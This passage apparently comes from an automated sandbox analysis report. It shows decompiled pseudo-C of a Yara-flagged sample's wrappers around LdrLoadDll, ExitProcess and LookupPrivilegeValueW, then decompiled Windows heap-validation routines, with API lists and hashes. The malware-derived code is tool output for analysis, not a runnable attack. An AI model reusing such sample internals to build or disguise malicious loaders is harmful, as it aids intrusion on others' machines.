                                                                                                                          				if(_t44 != 0) {
                                                                                                                          					L7:
                                                                                                                          					asm("cmpsb");
                                                                                                                          					 *_t27 =  *_t27 & _t17;
                                                                                                                          					_t7 = _t26 + 0x558b08c4;
                                                                                                                          					 *_t7 =  *((intOrPtr*)(_t26 + 0x558b08c4)) + _t17;
                                                                                                                          					__eflags =  *_t7;
                                                                                                                          					goto L8;
                                                                                                                          				} else {
                                                                                                                          					if(_t44 != 0) {
                                                                                                                          						L8:
                                                                                                                          						asm("les ecx, [eax]");
                                                                                                                          						goto L9;
                                                                                                                          					} else {
                                                                                                                          						asm("sbb [ebp-0x75], dl");
                                                                                                                          						_push(_t35);
                                                                                                                          						_t35 = _t38;
                                                                                                                          						_v4 =  &_v532;
                                                                                                                          						_t23 = E0041C810( &_v8, 0x104, _a12);
                                                                                                                          						_t42 = _t38 - 0x214 + 0xc;
                                                                                                                          						if(_t23 != 0) {
                                                                                                                          							_t25 = E0041CC30(__eflags, _v8);
                                                                                                                          							_t38 = _t42 + 4;
                                                                                                                          							__eflags = _t25;
                                                                                                                          							if(_t25 != 0) {
                                                                                                                          								_t27 =  &_v12;
                                                                                                                          								_t17 = E0041CEB0(_t27, 0);
                                                                                                                          								goto L7;
                                                                                                                          							}
                                                                                                                          							L9:
                                                                                                                          							_t18 = E0041B060(_v4);
                                                                                                                          							_v12 = _t18;
                                                                                                                          							__eflags = _t18;
                                                                                                                          							if(_t18 == 0) {
                                                                                                                          								LdrLoadDll(0, 0,  &_v8,  &_v12); // executed
                                                                                                                          								_t18 = _v12;
                                                                                                                          							}
                                                                                                                          							return _t18;
                                                                                                                          						} else {
                                                                                                                          							return _t23;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}


















                                                                                                                          APIs
                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2234796835-0
                                                                                                                          • Opcode ID: 6a1883fa3df364d00ab308787177eaaa5395b6c117eefb219030bb0774dce5ec
                                                                                                                          • Instruction ID: 8eb2301004882bfed2658affd43f0a5eeaebbd990e514aec3a06f004a3f8bdd8
                                                                                                                          • Opcode Fuzzy Hash: 6a1883fa3df364d00ab308787177eaaa5395b6c117eefb219030bb0774dce5ec
                                                                                                                          • Instruction Fuzzy Hash: 2201D875D4020DABCF10DBA4D881FDD77B5EF44318F1082EAE9099B251F235D65ACB42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 19%
                                                                                                                          			E0041A262(void* __eax, void* __ecx, void* _a1, int _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                          				intOrPtr _v0;
                                                                                                                          				void* _v1;
                                                                                                                          				signed char _t15;
                                                                                                                          				signed char _t24;
                                                                                                                          				void* _t32;
                                                                                                                          				signed char* _t33;
                                                                                                                          
                                                                                                                          				_t24 = __ecx - 1;
                                                                                                                          				asm("fisub word [ebx+esi*8]");
                                                                                                                          				_t15 = _t24;
                                                                                                                          				asm("les edi, [edx+0x1b]");
                                                                                                                          				asm("fcomp3 st6");
                                                                                                                          				if(_t24 >= 0) {
                                                                                                                          					_push(_t32);
                                                                                                                          					_t20 = _v0;
                                                                                                                          					_push(_t33);
                                                                                                                          					_t33 = _v0 + 0xc7c;
                                                                                                                          					E0041AB20(_t32, _t20, _t33,  *((intOrPtr*)(_t20 + 0xa14)), 0, 0x36);
                                                                                                                          					_t28 = _a4;
                                                                                                                          					_t15 =  *_t33;
                                                                                                                          					ExitProcess(_a4);
                                                                                                                          				}
                                                                                                                          				 *((intOrPtr*)(__eax - 0x75)) =  *((intOrPtr*)(__eax - 0x75)) - _t28;
                                                                                                                          				return  *( *_t33)(_a12, _a16, _a20, _a24, _a28, _a32, __eax, _t15 & 0x00000052);
                                                                                                                          			}










                                                                                                                          APIs
                                                                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A298
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 621844428-0
                                                                                                                          • Opcode ID: 4abe985106a79419cf1ec235fbccd1ea9952f58f99598e9530d47a1ee41f35d9
                                                                                                                          • Instruction ID: a7fe49d223b48750c27ab17b1d12878145246f7a98e041d23e66a3874a00bc26
                                                                                                                          • Opcode Fuzzy Hash: 4abe985106a79419cf1ec235fbccd1ea9952f58f99598e9530d47a1ee41f35d9
                                                                                                                          • Instruction Fuzzy Hash: A2018BB6200108ABC714DF98DC84EEB73ADEF88300F10815DBA5C9B642C634EA12CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 30%
                                                                                                                          			E0041A381(void* __edx, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
                                                                                                                          				intOrPtr _v0;
                                                                                                                          				void* _v117;
                                                                                                                          				signed int _t8;
                                                                                                                          				void* _t11;
                                                                                                                          				int _t17;
                                                                                                                          				intOrPtr* _t18;
                                                                                                                          				void* _t25;
                                                                                                                          
                                                                                                                          				_push(cs);
                                                                                                                          				_t11 = (_t8 | 0x00000060) - 0xca695158;
                                                                                                                          				asm("wait");
                                                                                                                          				if(_t11 > 0) {
                                                                                                                          					return  *_t18(_t11, __edx, cs);
                                                                                                                          				} else {
                                                                                                                          					_t14 = _v0;
                                                                                                                          					E0041AB20(_t25, _v0, _v0 + 0xc8c,  *((intOrPtr*)(_t14 + 0xa18)), 0, 0x46);
                                                                                                                          					_t17 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
                                                                                                                          					return _t17;
                                                                                                                          				}
                                                                                                                          			}











                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          • Opcode ID: 9469479746c1abb94035fb50c7da2de63c6e60b7007db871f5e55df9f7e952b6
                                                                                                                          • Instruction ID: 62cc6e4f7d922e68cfd5948dcaec3ae9cc405c55fcfe40af2c058d69eb1ce2bb
                                                                                                                          • Opcode Fuzzy Hash: 9469479746c1abb94035fb50c7da2de63c6e60b7007db871f5e55df9f7e952b6
                                                                                                                          • Instruction Fuzzy Hash: 2AF0BEB12001483BDA10EF689C86EEB3B6ADF84764F018196FD1D97202CA35E95187B5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0041A230(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                          				char _t10;
                                                                                                                          				void* _t15;
                                                                                                                          
                                                                                                                          				_t3 = _a4 + 0xc74; // 0xc74
                                                                                                                          				E0041AB20(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                                                          				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                          				return _t10;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A25D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3298025750-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0041A390(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                                                          				int _t10;
                                                                                                                          				void* _t15;
                                                                                                                          
                                                                                                                          				E0041AB20(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                                                                          				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                                                          				return _t10;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0041A270(intOrPtr _a4, int _a8) {
                                                                                                                          				void* _t10;
                                                                                                                          
                                                                                                                          				_t5 = _a4;
                                                                                                                          				E0041AB20(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                                                                          				ExitProcess(_a8);
                                                                                                                          			}





                                                                                                                          APIs
                                                                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A298
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 621844428-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Strings
                                                                                                                          • The resource is owned shared by %d threads, xrefs: 00A7B37E
                                                                                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00A7B39B
                                                                                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00A7B38F
                                                                                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00A7B2DC
                                                                                                                          • Go determine why that thread has not released the critical section., xrefs: 00A7B3C5
                                                                                                                          • <unknown>, xrefs: 00A7B27E, 00A7B2D1, 00A7B350, 00A7B399, 00A7B417, 00A7B48E
                                                                                                                          • read from, xrefs: 00A7B4AD, 00A7B4B2
                                                                                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00A7B476
                                                                                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00A7B3D6
                                                                                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00A7B484
                                                                                                                          • The instruction at %p tried to %s , xrefs: 00A7B4B6
                                                                                                                          • This failed because of error %Ix., xrefs: 00A7B446
                                                                                                                          • The critical section is owned by thread %p., xrefs: 00A7B3B9
                                                                                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00A7B47D
                                                                                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 00A7B352
                                                                                                                          • *** then kb to get the faulting stack, xrefs: 00A7B51C
                                                                                                                          • The resource is owned exclusively by thread %p, xrefs: 00A7B374
                                                                                                                          • a NULL pointer, xrefs: 00A7B4E0
                                                                                                                          • The instruction at %p referenced memory at %p., xrefs: 00A7B432
                                                                                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00A7B314
                                                                                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00A7B2F3
                                                                                                                          • write to, xrefs: 00A7B4A6
                                                                                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00A7B323
                                                                                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00A7B53F
                                                                                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00A7B305
                                                                                                                          • an invalid address, %p, xrefs: 00A7B4CF
                                                                                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 00A7B48F
                                                                                                                          • *** enter .cxr %p for the context, xrefs: 00A7B50D
                                                                                                                          • *** Inpage error in %ws:%s, xrefs: 00A7B418
                                                                                                                          • *** enter .exr %p for the exception record, xrefs: 00A7B4F1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • API String ID: 0-108210295
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 44%
                                                                                                                          			E00A81C06() {
                                                                                                                          				signed int _t27;
                                                                                                                          				char* _t104;
                                                                                                                          				char* _t105;
                                                                                                                          				intOrPtr _t113;
                                                                                                                          				intOrPtr _t115;
                                                                                                                          				intOrPtr _t117;
                                                                                                                          				intOrPtr _t119;
                                                                                                                          				intOrPtr _t120;
                                                                                                                          
                                                                                                                          				_t105 = 0x9a48a4;
                                                                                                                          				_t104 = "HEAP: ";
                                                                                                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                          					_push(_t104);
                                                                                                                          					E009CB150();
                                                                                                                          				} else {
                                                                                                                          					E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          				}
                                                                                                                          				_push( *0xab589c);
                                                                                                                          				E009CB150("Heap error detected at %p (heap handle %p)\n",  *0xab58a0);
                                                                                                                          				_t27 =  *0xab5898; // 0x0
                                                                                                                          				if(_t27 <= 0xf) {
                                                                                                                          					switch( *((intOrPtr*)(_t27 * 4 +  &M00A81E96))) {
                                                                                                                          						case 0:
                                                                                                                          							_t105 = "heap_failure_internal";
                                                                                                                          							goto L21;
                                                                                                                          						case 1:
                                                                                                                          							goto L21;
                                                                                                                          						case 2:
                                                                                                                          							goto L21;
                                                                                                                          						case 3:
                                                                                                                          							goto L21;
                                                                                                                          						case 4:
                                                                                                                          							goto L21;
                                                                                                                          						case 5:
                                                                                                                          							goto L21;
                                                                                                                          						case 6:
                                                                                                                          							goto L21;
                                                                                                                          						case 7:
                                                                                                                          							goto L21;
                                                                                                                          						case 8:
                                                                                                                          							goto L21;
                                                                                                                          						case 9:
                                                                                                                          							goto L21;
                                                                                                                          						case 0xa:
                                                                                                                          							goto L21;
                                                                                                                          						case 0xb:
                                                                                                                          							goto L21;
                                                                                                                          						case 0xc:
                                                                                                                          							goto L21;
                                                                                                                          						case 0xd:
                                                                                                                          							goto L21;
                                                                                                                          						case 0xe:
                                                                                                                          							goto L21;
                                                                                                                          						case 0xf:
                                                                                                                          							goto L21;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				L21:
                                                                                                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                          					_push(_t104);
                                                                                                                          					E009CB150();
                                                                                                                          				} else {
                                                                                                                          					E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          				}
                                                                                                                          				_push(_t105);
                                                                                                                          				E009CB150("Error code: %d - %s\n",  *0xab5898);
                                                                                                                          				_t113 =  *0xab58a4; // 0x0
                                                                                                                          				if(_t113 != 0) {
                                                                                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                          						_push(_t104);
                                                                                                                          						E009CB150();
                                                                                                                          					} else {
                                                                                                                          						E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          					}
                                                                                                                          					E009CB150("Parameter1: %p\n",  *0xab58a4);
                                                                                                                          				}
                                                                                                                          				_t115 =  *0xab58a8; // 0x0
                                                                                                                          				if(_t115 != 0) {
                                                                                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                          						_push(_t104);
                                                                                                                          						E009CB150();
                                                                                                                          					} else {
                                                                                                                          						E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          					}
                                                                                                                          					E009CB150("Parameter2: %p\n",  *0xab58a8);
                                                                                                                          				}
                                                                                                                          				_t117 =  *0xab58ac; // 0x0
                                                                                                                          				if(_t117 != 0) {
                                                                                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                          						_push(_t104);
                                                                                                                          						E009CB150();
                                                                                                                          					} else {
                                                                                                                          						E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          					}
                                                                                                                          					E009CB150("Parameter3: %p\n",  *0xab58ac);
                                                                                                                          				}
                                                                                                                          				_t119 =  *0xab58b0; // 0x0
                                                                                                                          				if(_t119 != 0) {
                                                                                                                          					L41:
                                                                                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                          						_push(_t104);
                                                                                                                          						E009CB150();
                                                                                                                          					} else {
                                                                                                                          						E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          					}
                                                                                                                          					_push( *0xab58b4);
                                                                                                                          					E009CB150("Last known valid blocks: before - %p, after - %p\n",  *0xab58b0);
                                                                                                                          				} else {
                                                                                                                          					_t120 =  *0xab58b4; // 0x0
                                                                                                                          					if(_t120 != 0) {
                                                                                                                          						goto L41;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                          					_push(_t104);
                                                                                                                          					E009CB150();
                                                                                                                          				} else {
                                                                                                                          					E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          				}
                                                                                                                          				return E009CB150("Stack trace available at %p\n", 0xab58c0);
                                                                                                                          			}












                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                                          • API String ID: 0-2897834094
                                                                                                                          • Opcode ID: 1afd6d58a641ed55e2860dcd14792b49f1915fbb8255b4f1dd320975e3c70494
                                                                                                                          • Instruction ID: 54db5487813737afdb5cc814c4193376c90f868db718f5268d53437af53a51e6
                                                                                                                          • Opcode Fuzzy Hash: 1afd6d58a641ed55e2860dcd14792b49f1915fbb8255b4f1dd320975e3c70494
                                                                                                                          • Instruction Fuzzy Hash: 6B61C132D54644DFC721BB94D996FB073FCEB44B30B1D803EF80A6B262D6649C429B0A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 59%
                                                                                                                          			E00A84AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                          				signed int _v6;
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				void* __ebp;
                                                                                                                          				signed int _t189;
                                                                                                                          				intOrPtr _t191;
                                                                                                                          				intOrPtr _t210;
                                                                                                                          				signed int _t225;
                                                                                                                          				signed char _t231;
                                                                                                                          				intOrPtr _t232;
                                                                                                                          				unsigned int _t245;
                                                                                                                          				intOrPtr _t249;
                                                                                                                          				intOrPtr _t259;
                                                                                                                          				signed int _t281;
                                                                                                                          				signed int _t283;
                                                                                                                          				intOrPtr _t284;
                                                                                                                          				signed int _t288;
                                                                                                                          				signed int* _t294;
                                                                                                                          				signed int* _t298;
                                                                                                                          				intOrPtr* _t299;
                                                                                                                          				intOrPtr* _t300;
                                                                                                                          				signed int _t307;
                                                                                                                          				signed int _t309;
                                                                                                                          				signed short _t312;
                                                                                                                          				signed short _t315;
                                                                                                                          				signed int _t317;
                                                                                                                          				signed int _t320;
                                                                                                                          				signed int _t322;
                                                                                                                          				signed int _t326;
                                                                                                                          				signed int _t327;
                                                                                                                          				void* _t328;
                                                                                                                          				signed int _t332;
                                                                                                                          				signed int _t340;
                                                                                                                          				signed int _t342;
                                                                                                                          				signed char _t344;
                                                                                                                          				signed int* _t345;
                                                                                                                          				void* _t346;
                                                                                                                          				signed char _t352;
                                                                                                                          				signed char _t367;
                                                                                                                          				signed int _t374;
                                                                                                                          				intOrPtr* _t378;
                                                                                                                          				signed int _t380;
                                                                                                                          				signed int _t385;
                                                                                                                          				signed char _t390;
                                                                                                                          				unsigned int _t392;
                                                                                                                          				signed char _t395;
                                                                                                                          				unsigned int _t397;
                                                                                                                          				intOrPtr* _t400;
                                                                                                                          				signed int _t402;
                                                                                                                          				signed int _t405;
                                                                                                                          				intOrPtr* _t406;
                                                                                                                          				signed int _t407;
                                                                                                                          				intOrPtr _t412;
                                                                                                                          				void* _t414;
                                                                                                                          				signed int _t415;
                                                                                                                          				signed int _t416;
                                                                                                                          				signed int _t429;
                                                                                                                          
                                                                                                                          				_v16 = _v16 & 0x00000000;
                                                                                                                          				_t189 = 0;
                                                                                                                          				_v8 = _v8 & 0;
                                                                                                                          				_t332 = __edx;
                                                                                                                          				_v12 = 0;
                                                                                                                          				_t414 = __ecx;
                                                                                                                          				_t415 = __edx;
                                                                                                                          				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
                                                                                                                          					L88:
                                                                                                                          					_t416 = _v16;
                                                                                                                          					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
                                                                                                                          						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
                                                                                                                          						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
                                                                                                                          							L107:
                                                                                                                          							return 1;
                                                                                                                          						}
                                                                                                                          						_t191 =  *[fs:0x30];
                                                                                                                          						__eflags =  *(_t191 + 0xc);
                                                                                                                          						if( *(_t191 + 0xc) == 0) {
                                                                                                                          							_push("HEAP: ");
                                                                                                                          							E009CB150();
                                                                                                                          						} else {
                                                                                                                          							E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          						}
                                                                                                                          						_push(_v12);
                                                                                                                          						_push( *((intOrPtr*)(_t332 + 0x30)));
                                                                                                                          						_push(_t332);
                                                                                                                          						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
                                                                                                                          						L122:
                                                                                                                          						E009CB150();
                                                                                                                          						L119:
                                                                                                                          						return 0;
                                                                                                                          					}
                                                                                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                          						_push("HEAP: ");
                                                                                                                          						E009CB150();
                                                                                                                          					} else {
                                                                                                                          						E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          					}
                                                                                                                          					_push(_t416);
                                                                                                                          					_push( *((intOrPtr*)(_t332 + 0x2c)));
                                                                                                                          					_push(_t332);
                                                                                                                          					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
                                                                                                                          					goto L122;
                                                                                                                          				} else {
                                                                                                                          					goto L1;
                                                                                                                          				}
                                                                                                                          				do {
                                                                                                                          					L1:
                                                                                                                          					 *_a16 = _t415;
                                                                                                                          					if( *(_t414 + 0x4c) != 0) {
                                                                                                                          						_t392 =  *(_t414 + 0x50) ^  *_t415;
                                                                                                                          						 *_t415 = _t392;
                                                                                                                          						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
                                                                                                                          						_t424 = _t392 >> 0x18 - _t352;
                                                                                                                          						if(_t392 >> 0x18 != _t352) {
                                                                                                                          							_push(_t352);
                                                                                                                          							E00A7FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
                                                                                                                          						_t210 =  *[fs:0x30];
                                                                                                                          						__eflags =  *(_t210 + 0xc);
                                                                                                                          						if( *(_t210 + 0xc) == 0) {
                                                                                                                          							_push("HEAP: ");
                                                                                                                          							E009CB150();
                                                                                                                          						} else {
                                                                                                                          							E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          						}
                                                                                                                          						_push(_v8 & 0x0000ffff);
                                                                                                                          						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
                                                                                                                          						__eflags = _t340;
                                                                                                                          						_push(_t340);
                                                                                                                          						E009CB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
                                                                                                                          						L117:
                                                                                                                          						__eflags =  *(_t414 + 0x4c);
                                                                                                                          						if( *(_t414 + 0x4c) != 0) {
                                                                                                                          							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                                                                                                          							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                                                                          							__eflags =  *_t415;
                                                                                                                          						}
                                                                                                                          						goto L119;
                                                                                                                          					}
                                                                                                                          					_t225 =  *_t415 & 0x0000ffff;
                                                                                                                          					_t390 =  *(_t415 + 2);
                                                                                                                          					_t342 = _t225;
                                                                                                                          					_v8 = _t342;
                                                                                                                          					_v20 = _t342;
                                                                                                                          					_v28 = _t225 << 3;
                                                                                                                          					if((_t390 & 0x00000001) == 0) {
                                                                                                                          						__eflags =  *(_t414 + 0x40) & 0x00000040;
                                                                                                                          						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
                                                                                                                          						__eflags = _t344 & 0x00000001;
                                                                                                                          						if((_t344 & 0x00000001) == 0) {
                                                                                                                          							L66:
                                                                                                                          							_t345 = _a12;
                                                                                                                          							 *_a8 =  *_a8 + 1;
                                                                                                                          							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
                                                                                                                          							__eflags =  *_t345;
                                                                                                                          							L67:
                                                                                                                          							_t231 =  *(_t415 + 6);
                                                                                                                          							if(_t231 == 0) {
                                                                                                                          								_t346 = _t414;
                                                                                                                          							} else {
                                                                                                                          								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
                                                                                                                          							}
                                                                                                                          							if(_t346 != _t332) {
                                                                                                                          								_t232 =  *[fs:0x30];
                                                                                                                          								__eflags =  *(_t232 + 0xc);
                                                                                                                          								if( *(_t232 + 0xc) == 0) {
                                                                                                                          									_push("HEAP: ");
                                                                                                                          									E009CB150();
                                                                                                                          								} else {
                                                                                                                          									E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          								}
                                                                                                                          								_push( *(_t415 + 6) & 0x000000ff);
                                                                                                                          								_push(_t415);
                                                                                                                          								_push("Heap block at %p has incorrect segment offset (%x)\n");
                                                                                                                          								goto L95;
                                                                                                                          							} else {
                                                                                                                          								if( *((char*)(_t415 + 7)) != 3) {
                                                                                                                          									__eflags =  *(_t414 + 0x4c);
                                                                                                                          									if( *(_t414 + 0x4c) != 0) {
